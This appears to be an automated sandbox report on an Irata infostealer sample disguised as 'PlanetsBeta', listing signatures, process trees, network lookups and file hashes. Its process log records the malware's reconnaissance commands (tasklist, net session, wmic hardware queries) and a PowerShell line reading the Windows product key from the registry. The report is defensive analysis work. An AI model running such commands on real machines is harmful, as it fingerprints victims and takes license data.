Malware Analysis Report

2025-01-19 05:52

Sample ID 231218-wsnfhsdff7
Target PlanetsBeta.rar
SHA256 4ccdc6e7c8fd112a6168c37ac6b315717e34c2767e7c36b04e74fd2e20fbd97e
Tags
irata infostealer rat trojan discovery persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4ccdc6e7c8fd112a6168c37ac6b315717e34c2767e7c36b04e74fd2e20fbd97e

Threat Level: Known bad

The file PlanetsBeta.rar was found to be: Known bad.

Malicious Activity Summary

irata infostealer rat trojan discovery persistence spyware stealer

Irata

Irata payload

Executes dropped EXE

Drops startup file

Loads dropped DLL

Reads user/profile data of web browsers

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Unsigned PE

Enumerates physical storage devices

Views/modifies file attributes

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Collects information from the system

Detects videocard installed

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 18:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 18:11

Reported

2023-12-18 18:14

Platform

win7-20231215-en

Max time kernel

151s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2872 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 2872 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 2872 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 2872 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 1720 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1356 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1356 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1720 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 1720 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 1720 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe
PID 1720 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 2376 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2376 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2376 wrote to memory of 2304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1720 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 2752 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2752 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2752 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1744 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1744 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1744 wrote to memory of 744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1188 wrote to memory of 2940 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1188 wrote to memory of 2940 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1188 wrote to memory of 2940 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1720 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1260 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1260 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2228 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2228 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2228 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2348 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2348 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2348 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2348 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2348 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2348 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com

Processes

C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe

"C:\Users\Admin\AppData\Local\Temp\PlanetsBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=968 --field-trial-handle=1168,918162448225093282,9292732144128430291,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2872 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=2872 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 www.google.com udp
US 34.117.186.192:443 ipinfo.io tcp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp

Files

\Users\Admin\AppData\Local\Temp\nso58DB.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nso58DB.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\d3dcompiler_47.dll

MD5 d4cbb9f882b273141e961b8a38f0475b
SHA1 66f29029659ff15c943d63726b84d6ee3a270500
SHA256 380d278484730ca59580f372f41f87c191a3a2230473b29ed0e5b5e195cc305e
SHA512 0469ab543cc659ad491bf18868936c7c91d8b177c36e9cf6239106da02bb71b350401ea7d2203573a2ec09eea6258ba396888d8c81006d980c943b3eb8185e3a

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\ffmpeg.dll

MD5 34cebe9da9cdeecb27919a2c0f3057c2
SHA1 6656f255ee90d96175bb9ba14992d67f50cb3809
SHA256 459cb4df8950b73d7f509e1a57fcd4c6843909ab5f195b8b14fcb312d75fc4b9
SHA512 55c51138046ea72a1873f81fc193344d00c549eefd425b7cf29f63302021d3a3ed8f0ec19efb6cbc4b96a3b499b7d6f5d3d53ba498c2253b1fda7a45a5559299

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\icudtl.dat

MD5 e461b36d76da95d88b769df771d34e1a
SHA1 a6d73247a6929148b028f40bb119a12592621e19
SHA256 c9b136721679dec0e9930c23c57123a8c653349c2c1a95641e630ec8a222ea18
SHA512 de3e919d28c8d2e2b5a1036f17a66561c70d0baed1ce5fc9c966b7f95ced59e8317b3bc3838928f744ddca0bafbe1f7a55e5d837b1ec3cb90616f21ffc0190b9

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\LICENSES.chromium.html

MD5 b8090d87cbf13de00a5366b8895c9289
SHA1 539079344ee3898928a4282288efd5e937208829
SHA256 d17dea3022e45e3a1dd97e9364a76711b738ca988a49f97550df2cc6476ffb36
SHA512 8cb45874555709c70dea377d6f9984cb352685bafb4c6f66de5e7d4d6d8df08992b72c6c792a0abbc6c1483d93554ee121f693f643d0022dbcc0d721823efb9b

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\libGLESv2.dll

MD5 fe67e571f31b7debb1ed396abdc25965
SHA1 19e5b8fbc3d1140f7e4bd39af4bf86671f4cdd20
SHA256 b7fe7ee0bf570a81ce580c629d963fe55cdc94bd55e3d4e79bf98fb2a83c90ff
SHA512 41593293ad262345352d402730712c54a7886bc0522cc8dc92ae0f456379edb01621959a2fd243a4ee9306e5b073ca48aa5769046896714ed34f1aa69148f97e

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\PlanetsBeta.exe

MD5 906723e50817bd71f83bafc3b2bba7d7
SHA1 fee99cc70f6aa3e16a5458ed9f71e26cd152234b
SHA256 a3fb0749d8f846258b0c7af5de22db9e82b8b27112cb2a3c44e7e8e627c93a37
SHA512 f1bdf7b74c07f2f0bbff91871d1edcfdcc57d9b73fb31da732e6f8e5adc5b48e0e963325272e551548589be9148ffeb464092357eece54be4cf399c38447a04d

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\resources.pak

MD5 069db033ae6b98c89a678fc0aa34c34e
SHA1 7b9acd7393b2b76b83005f38d642777182d8ff17
SHA256 ba4a4f70bb9a56df20514888bf17c72f3d12cc508d02b5893bc2f114adaf7361
SHA512 7e900defb18814692546d75bb1722cf2e92cdf88b5473d8b4bb7a2a58fed40d27391d2b87ec421f411585d17e379bf3f4d4034aa80ccf4047b360f8649397211

C:\Users\Admin\AppData\Local\Temp\nso58DB.tmp\7z-out\v8_context_snapshot.bin

MD5 a6589072faa2f0ee98b2804db273dcf6
SHA1 258dab4dbffdf40832b10bf3dd9bef3640f3fccd
SHA256 debb7b447ba288189a42f7e05a8915545ad5ab90fb1dae728f4dd8f206e1811b
